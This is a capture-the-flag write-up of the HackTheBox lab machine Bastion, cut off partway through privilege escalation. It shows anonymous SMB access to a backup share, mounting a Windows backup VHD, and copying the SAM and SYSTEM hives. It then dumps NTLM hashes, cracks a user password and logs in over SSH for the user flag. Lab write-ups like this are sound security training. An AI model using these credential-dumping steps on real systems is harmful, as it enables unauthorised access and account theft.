HTB Bastion Writeup

HackTheBox Bastion – Today we are solving another HTB machine, Bastion, and will pick up some useful CTF techniques along the way.

As always, we start with a minimal nmap scan.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ nmap bastion.htb   
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 19:13 IST
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.17s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 13.67 seconds

From the initial scan, let's scan only the open ports for more information.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo nmap -sV -sC -A -O -p22,135,139,445 bastion.htb -oA bastion -vv
[sudo] password for abhinav: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 19:15 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
Initiating Ping Scan at 19:15
Scanning bastion.htb (10.10.10.134) [4 ports]
Completed Ping Scan at 19:15, 0.23s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:15
Scanning bastion.htb (10.10.10.134) [4 ports]
Discovered open port 135/tcp on 10.10.10.134
Discovered open port 22/tcp on 10.10.10.134
Discovered open port 445/tcp on 10.10.10.134
Discovered open port 139/tcp on 10.10.10.134
Completed SYN Stealth Scan at 19:15, 0.27s elapsed (4 total ports)
Initiating Service scan at 19:15
Scanning 4 services on bastion.htb (10.10.10.134)
Completed Service scan at 19:15, 6.71s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against bastion.htb (10.10.10.134)
Retrying OS detection (try #2) against bastion.htb (10.10.10.134)
Initiating Traceroute at 19:15
Completed Traceroute at 19:15, 0.19s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:15
Completed Parallel DNS resolution of 1 host. at 19:15, 0.03s elapsed
NSE: Script scanning 10.10.10.134.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 12.47s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
Nmap scan report for bastion.htb (10.10.10.134)
Host is up, received echo-reply ttl 127 (0.18s latency).
Scanned at 2021-07-20 19:15:33 IST for 24s

PORT    STATE SERVICE      REASON          VERSION
22/tcp  open  ssh          syn-ack ttl 127 OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
|   256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.91%E=4%D=7/20%OT=22%CT=%CU=34383%PV=Y%DS=2%DC=T%G=N%TM=60F6D395%P=x86_64-pc-linux-gnu)
SEQ(SP=108%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S%TS=A)
OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)
WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)
T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)
T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)

Uptime guess: 0.005 days (since Tue Jul 20 19:09:08 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -38m18s, deviation: 1h09m14s, median: 1m39s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 9831/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 26941/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 57335/udp): CLEAN (Failed to receive data)
|   Check 4 (port 18741/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-20T15:47:29+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-20T13:47:26
|_  start_date: 2021-07-20T13:41:01

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   175.65 ms 10.10.14.1
2   176.04 ms bastion.htb (10.10.10.134)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:15
Completed NSE at 19:15, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.02 seconds
           Raw packets sent: 50 (3.604KB) | Rcvd: 49 (3.436KB)
                                                                                

The detailed nmap scan shows some interesting information: SSH, SMB, Windows Server 2016 and more.

I think for me and everyone else, SMB is the most exciting piece to check first most of the time.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ smbclient --list //bastion.htb/ -U ""
Enter WORKGROUP\'s password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

From the above we can infer that we should focus on the Backups folder.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ smbclient //bastion.htb/Backups -U ""
Enter WORKGROUP\'s password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Apr 16 15:32:11 2019
  ..                                  D        0  Tue Apr 16 15:32:11 2019
  note.txt                           AR      116  Tue Apr 16 15:40:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 18:13:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 18:14:02 2019

		7735807 blocks of size 4096. 2763249 blocks available
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

The interesting entries are note.txt, which we fetch using get in smbclient (snippet above), and WindowsImageBackup, which would usually be too large to pull over the VPN.

The contents of note.txt are below.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ ls | grep note
note.txt
                                                                                                                                                                                                                                              
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ cat note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

So the other piece of information is WindowsImageBackup; let's look further into that.

                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ smbclient //bastion.htb/Backups -U ""
Enter WORKGROUP\'s password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Apr 16 15:32:11 2019
  ..                                  D        0  Tue Apr 16 15:32:11 2019
  note.txt                           AR      116  Tue Apr 16 15:40:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 18:13:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 18:14:02 2019

		7735807 blocks of size 4096. 2747596 blocks available
smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup\> ls
  .                                  Dn        0  Fri Feb 22 18:14:02 2019
  ..                                 Dn        0  Fri Feb 22 18:14:02 2019
  L4mpje-PC                          Dn        0  Fri Feb 22 18:15:32 2019

		7735807 blocks of size 4096. 2747596 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> ls
  .                                  Dn        0  Fri Feb 22 18:15:32 2019
  ..                                 Dn        0  Fri Feb 22 18:15:32 2019
  Backup 2019-02-22 124351           Dn        0  Fri Feb 22 18:15:32 2019
  Catalog                            Dn        0  Fri Feb 22 18:15:32 2019
  MediaId                            An       16  Fri Feb 22 18:14:02 2019
  SPPMetadataCache                   Dn        0  Fri Feb 22 18:15:32 2019

		7735807 blocks of size 4096. 2747596 blocks available
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351\"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls
  .                                  Dn        0  Fri Feb 22 18:15:32 2019
  ..                                 Dn        0  Fri Feb 22 18:15:32 2019
  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd     An 37761024  Fri Feb 22 18:14:03 2019
  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd     An 5418299392  Fri Feb 22 18:15:32 2019
  BackupSpecs.xml                    An     1186  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml     An     1078  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml     An     8930  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml     An     6542  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml     An     2894  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml     An     1488  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml     An     1484  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml     An     3844  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml     An     3988  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml     An     7110  Fri Feb 22 18:15:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml     An  2374620  Fri Feb 22 18:15:32 2019

		7735807 blocks of size 4096. 2747596 blocks available
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> 

Let's mount one of these VHDs on our local machine, since the note makes it clear that downloading is not an option.

We will use qemu-utils, which can be installed if it is not already present.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo apt-get install qemu-utils
[sudo] password for abhinav: 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-image-5.10.0-kali3-amd64 python3-gevent python3-gevent-websocket python3-greenlet python3-jupyter-core python3-m2crypto python3-nbformat python3-parameterized python3-plotly python3-zope.event
Use 'sudo apt autoremove' to remove them.
Suggested packages:
  debootstrap qemu-block-extra
The following NEW packages will be installed:
  qemu-utils
0 upgraded, 1 newly installed, 0 to remove and 28 not upgraded.
Need to get 1,205 kB of archives.
After this operation, 6,224 kB of additional disk space will be used.
Get:1 https://hlzmel.fsmg.org.nz/kali kali-rolling/main amd64 qemu-utils amd64 1:5.2+dfsg-10+b2 [1,205 kB]
Fetched 1,205 kB in 8s (158 kB/s)                                                                                                                                                                                                           
Selecting previously unselected package qemu-utils.
(Reading database ... 385831 files and directories currently installed.)
Preparing to unpack .../qemu-utils_1%3a5.2+dfsg-10+b2_amd64.deb ...
Unpacking qemu-utils (1:5.2+dfsg-10+b2) ...
Setting up qemu-utils (1:5.2+dfsg-10+b2) ...
Processing triggers for man-db (2.9.4-2) ...
Processing triggers for kali-menu (2021.2.3) ...
                                                                                                                                                                                                                                             

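Let's mount the VHD 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd now; you can search for how to do this. The commands below mount the share over CIFS, attach the VHD read-only as /dev/nbd0 with qemu-nbd, and mount its first partition read-only.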

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo mkdir /mnt/L4mpje-PC
[sudo] password for abhinav: 
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo mkdir /mnt/vhd      
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo modprobe nbd
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo mount -t cifs //bastion.htb/Backups/WindowsImageBackup/L4mpje-PC  /mnt/L4mpje-PC/ -o user=anonymous
Password for anonymous@//bastion.htb/Backups/WindowsImageBackup/L4mpje-PC: 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo qemu-nbd -r -c /dev/nbd0 "/mnt/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ sudo mount -r /dev/nbd0p1 /mnt/vhd                                                                              
                                                                                                                                                                                                                                             

Now that the VHD 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd is mounted, we can see its contents.

$ cd /mnt/vhd
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd]
└─$ ls -la        
total 2096745
drwxrwxrwx 1 root root      12288 Feb 22  2019  .
drwxr-xr-x 4 root root       4096 Jul 21 01:04  ..
drwxrwxrwx 1 root root          0 Feb 22  2019 '$Recycle.Bin'
-rwxrwxrwx 1 root root         24 Jun 11  2009  autoexec.bat
-rwxrwxrwx 1 root root         10 Jun 11  2009  config.sys
lrwxrwxrwx 2 root root         14 Jul 14  2009 'Documents and Settings' -> /mnt/vhd/Users
-rwxrwxrwx 1 root root 2147016704 Feb 22  2019  pagefile.sys
drwxrwxrwx 1 root root          0 Jul 14  2009  PerfLogs
drwxrwxrwx 1 root root       4096 Jul 14  2009  ProgramData
drwxrwxrwx 1 root root       4096 Apr 12  2011 'Program Files'
drwxrwxrwx 1 root root          0 Feb 22  2019  Recovery
drwxrwxrwx 1 root root       4096 Feb 22  2019 'System Volume Information'
drwxrwxrwx 1 root root       4096 Feb 22  2019  Users
drwxrwxrwx 1 root root      16384 Feb 22  2019  Windows

Dumb me tried to search for the user flag but had no luck; however, the output of a few folders was as below.

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd]
└─$ cd Users   
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users]
└─$ ls    
'All Users'   Default  'Default User'   desktop.ini   L4mpje   Public
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users]
└─$ cd L4mpje 
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje]
└─$ ls
 AppData             Documents         Music                                                     NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms   Pictures       SendTo
'Application Data'   Downloads        'My Documents'                                             NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms   PrintHood     'Start Menu'
 Contacts            Favorites         NetHood                                                   ntuser.dat.LOG1                                                                                Recent         Templates
 Cookies             Links             NTUSER.DAT                                                ntuser.dat.LOG2                                                                               'Saved Games'   Videos
 Desktop            'Local Settings'   NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf   ntuser.ini                                                                                     Searches
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje]
└─$ cd Desktop 
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Desktop]
└─$ ls
desktop.ini
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Desktop]
└─$ cd ..     
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje]
└─$ cd Documents 
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Documents]
└─$ ls
 desktop.ini  'My Music'  'My Pictures'  'My Videos'
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Documents]
└─$ cd ..    

On a Windows box, it is a crime not to look in the config folder under System32 to see if we can get hold of any users or hashes, so let's go there.

┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd]
└─$ cd Windows/System32/config/   
                                                                                                                                                                                                                          
┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Windows/System32/config]
└─$ ls -la
total 74740
drwxrwxrwx 1 root root    12288 Feb 22  2019 .
drwxrwxrwx 1 root root   655360 Feb 22  2019 ..
-rwxrwxrwx 2 root root    28672 Feb 23  2019 BCD-Template
-rwxrwxrwx 2 root root    25600 Feb 23  2019 BCD-Template.LOG
-rwxrwxrwx 2 root root 30932992 Feb 22  2019 COMPONENTS
-rwxrwxrwx 2 root root  1048576 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms
-rwxrwxrwx 2 root root  1048576 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms
-rwxrwxrwx 2 root root  1048576 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms
-rwxrwxrwx 2 root root    65536 Feb 22  2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf
-rwxrwxrwx 2 root root    65536 Feb 22  2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf
-rwxrwxrwx 2 root root   524288 Feb 22  2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
-rwxrwxrwx 2 root root   524288 Jul 14  2009 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
-rwxrwxrwx 2 root root     1024 Apr 12  2011 COMPONENTS.LOG
-rwxrwxrwx 2 root root   262144 Feb 22  2019 COMPONENTS.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 COMPONENTS.LOG2
-rwxrwxrwx 1 root root   262144 Feb 22  2019 DEFAULT
-rwxrwxrwx 1 root root     1024 Apr 12  2011 DEFAULT.LOG
-rwxrwxrwx 2 root root    91136 Feb 22  2019 DEFAULT.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 DEFAULT.LOG2
drwxrwxrwx 1 root root        0 Jul 14  2009 Journal
drwxrwxrwx 1 root root        0 Feb 22  2019 RegBack
-rwxrwxrwx 1 root root   262144 Feb 22  2019 SAM
-rwxrwxrwx 1 root root     1024 Apr 12  2011 SAM.LOG
-rwxrwxrwx 2 root root    21504 Feb 22  2019 SAM.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 SAM.LOG2
-rwxrwxrwx 1 root root   262144 Feb 22  2019 SECURITY
-rwxrwxrwx 1 root root     1024 Apr 12  2011 SECURITY.LOG
-rwxrwxrwx 2 root root    21504 Feb 22  2019 SECURITY.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 SECURITY.LOG2
-rwxrwxrwx 1 root root 24117248 Feb 22  2019 SOFTWARE
-rwxrwxrwx 1 root root     1024 Apr 12  2011 SOFTWARE.LOG
-rwxrwxrwx 2 root root   262144 Feb 22  2019 SOFTWARE.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 SOFTWARE.LOG2
-rwxrwxrwx 1 root root  9699328 Feb 22  2019 SYSTEM
-rwxrwxrwx 1 root root     1024 Apr 12  2011 SYSTEM.LOG
-rwxrwxrwx 2 root root   262144 Feb 22  2019 SYSTEM.LOG1
-rwxrwxrwx 2 root root        0 Jul 14  2009 SYSTEM.LOG2
drwxrwxrwx 1 root root     4096 Nov 21  2010 systemprofile
drwxrwxrwx 1 root root     4096 Feb 22  2019 TxR

As we can read these files, let's dump SAM and SYSTEM to see more; we can do so using samdump2.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ cp /mnt/vhd/Windows/System32/config/SYSTEM .
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ cp /mnt/vhd/Windows/System32/config/SAM .   
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ ls
bastion.gnmap  bastion.nmap  bastion.xml  note.txt  SAM  SYSTEM

Let's use samdump2.

                                                                                                                                                                                                                                           
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ samdump2 ./SYSTEM ./SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
 

We already have the information we were looking for, but another tool that does the same is Impacket's secretsdump.

                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ secretsdump.py LOCAL -system ./SYSTEM -sam ./SAM
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up... 
      

You can use your favourite hash cracker or online repositories to recover the password from the hash for L4mpje.

CrackStation recovered the password for this hash.

So we have some juicy information, L4mpje : bureaulampje. What next? SSH.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ ssh L4mpje@bastion.htb         
The authenticity of host 'bastion.htb (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? Yes
Warning: Permanently added 'bastion.htb,10.10.10.134' (ECDSA) to the list of known hosts.
L4mpje@bastion.htb's password: 
Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

l4mpje@BASTION C:\Users\L4mpje>cd Desktop                                                                                       

l4mpje@BASTION C:\Users\L4mpje\Desktop>ls                                                                                       
'ls' is not recognized as an internal or external command,                                                                      
operable program or batch file.                                                                                                 

l4mpje@BASTION C:\Users\L4mpje\Desktop>dir                                                                                      
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\L4mpje\Desktop                                                                                           

22-02-2019  16:27    <DIR>          .                                                                                           
22-02-2019  16:27    <DIR>          ..                                                                                          
23-02-2019  10:07                32 user.txt                                                                                    
               1 File(s)             32 bytes                                                                                   
               2 Dir(s)  11.295.985.664 bytes free                                                                              

l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt                                                                            
9bfe57d5c3309db3a151772f9d86c6cd                                                                                                
l4mpje@BASTION C:\Users\L4mpje\Desktop>   

So we now have the user flag in the usual path (Desktop/user.txt).

Let's try to get root.txt.

Privilege Escalation

Traversing some directories, we notice something interesting:

l4mpje@BASTION C:\Users\L4mpje\Desktop>cd ..                                                                                    

l4mpje@BASTION C:\Users\L4mpje>cd appdata                                                                                       

l4mpje@BASTION C:\Users\L4mpje\AppData>cd roaming                                                                               

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming>dir                                                                              
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\L4mpje\AppData\Roaming                                                                                   

22-02-2019  15:01    <DIR>          .                                                                                           
22-02-2019  15:01    <DIR>          ..                                                                                          
22-02-2019  14:50    <DIR>          Adobe                                                                                       
22-02-2019  15:03    <DIR>          mRemoteNG                                                                                   
               0 File(s)              0 bytes                                                                                   
               4 Dir(s)  11.295.985.664 bytes free                                                                              

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming>  

mRemoteNG is an interesting entry. It is an open-source fork of mRemote, and it saves
connection information in confCons.xml, which we can locate and analyze.

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming>cd mRemoteNG                                                                     

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir                                                                    
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG                                                                         

22-02-2019  15:03    <DIR>          .                                                                                           
22-02-2019  15:03    <DIR>          ..                                                                                          
22-02-2019  15:03             6.316 confCons.xml                                                                                
22-02-2019  15:02             6.194 confCons.xml.20190222-1402277353.backup                                                     
22-02-2019  15:02             6.206 confCons.xml.20190222-1402339071.backup                                                     
22-02-2019  15:02             6.218 confCons.xml.20190222-1402379227.backup                                                     
22-02-2019  15:02             6.231 confCons.xml.20190222-1403070644.backup                                                     
22-02-2019  15:03             6.319 confCons.xml.20190222-1403100488.backup                                                     
